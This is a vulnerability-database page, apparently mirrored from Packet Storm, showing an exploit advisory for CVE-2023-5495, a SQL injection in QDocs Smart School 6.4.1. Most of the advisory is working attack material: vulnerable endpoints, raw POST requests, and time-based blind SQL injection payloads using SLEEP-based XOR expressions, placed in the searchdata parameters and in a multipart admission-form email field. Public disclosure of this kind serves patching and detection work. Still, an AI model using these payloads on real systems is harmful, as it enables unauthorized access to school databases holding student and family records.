Lucene search
+L

Smart School 6.4.1 SQL Injection

🗓️ 11 Oct 2023 00:00:00Reported by CraCkErType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 280 Views

Smart School 6.4.1 SQL Injection allows unauthorized access, data modification, and application crash via 'searchdata' POST parameters. Vendor: QDocs. Impact: Database Access. CWE: CWE-89, CWE-74, CWE-70

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Smart School 6.4.1 - SQL Injection Vulnerability
2 Apr 202400:00
zdt
Circl
CVE-2023-5495
10 Oct 202320:22
circl
CNNVD
QDocs Smart School SQL Injection Vulnerability
10 Oct 202300:00
cnnvd
CVE
CVE-2023-5495
10 Oct 202316:31
cve
Cvelist
CVE-2023-5495 QDocs Smart School HTTP POST Request sql injection
10 Oct 202316:31
cvelist
Exploit DB
Smart School 6.4.1 - SQL Injection
2 Apr 202400:00
exploitdb
EUVD
EUVD-2023-57809
3 Oct 202520:07
euvd
NVD
CVE-2023-5495
10 Oct 202317:15
nvd
OSV
CVE-2023-5495
10 Oct 202317:15
osv
Prion
Sql injection
10 Oct 202317:15
prion
Rows per page
`# Exploit Title: Smart School 6.4.1 - SQL Injection  
# Exploit Author: CraCkEr  
# Date: 28/09/2023  
# Vendor: QDocs - qdocs.net  
# Vendor Homepage: https://smart-school.in/  
# Software Link: https://demo.smart-school.in/  
# Tested on: Windows 10 Pro  
# Impact: Database Access  
# CVE: CVE-2023-5495  
# CWE: CWE-89 - CWE-74 - CWE-707  
  
  
## Greetings  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
  
## Description  
  
SQL injection attacks can allow unauthorized access to sensitive data, modification of  
data and crash the application or make it unavailable, leading to lost revenue and  
damage to a company's reputation.  
  
  
Path: /course/filterRecords/  
  
POST Parameter 'searchdata[0][title]' is vulnerable to SQLi  
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi  
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi  
  
searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]  
  
-------------------------------------------  
POST /course/filterRecords/ HTTP/1.1  
  
  
searchdata%5B0%5D%5Btitle%5D=rating&searchdata%5B0%5D%5Bsearchfield%5D=sleep(5)%23&searchdata%5B0%5D%5Bsearchvalue%5D=3  
  
-------------------------------------------  
  
searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]  
  
  
Path: /course/filterRecords/  
  
  
POST Parameter 'searchdata[0][title]' is vulnerable to SQLi  
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi  
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi  
POST Parameter 'searchdata[1][title]' is vulnerable to SQLi  
POST Parameter 'searchdata[1][searchfield]' is vulnerable to SQLi  
POST Parameter 'searchdata[1][searchvalue]' is vulnerable to SQLi  
  
---  
Parameter: searchdata[0][title] (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low  
  
Parameter: searchdata[0][searchfield] (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low  
  
Parameter: searchdata[0][searchvalue] (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low  
  
Parameter: searchdata[1][title] (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low  
  
Parameter: searchdata[1][searchvalue] (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z  
---  
  
  
-------------------------------------------  
POST /course/filterRecords/ HTTP/1.1  
  
  
searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]  
-------------------------------------------  
  
  
  
Path: /online_admission  
  
---  
Parameter: MULTIPART email ((custom) POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: -----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="class_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="section_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="firstname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="lastname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="gender"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="dob"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mobileno"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="email"\n\n'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="file"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="father_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mother_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_relation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_email"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_pic"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_phone"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_occupation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="current_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="permanent_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="adhar_no"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="samagra_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="previous_school"\n\n\n-----------------------------320375734131102816923531485385--  
---  
  
POST Parameter 'email' is vulnerable to SQLi  
  
POST /online_admission HTTP/1.1  
  
-----------------------------320375734131102816923531485385  
Content-Disposition: form-data; name="email"  
  
*[SQLi]  
-----------------------------320375734131102816923531485385  
  
  
[-] Done  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation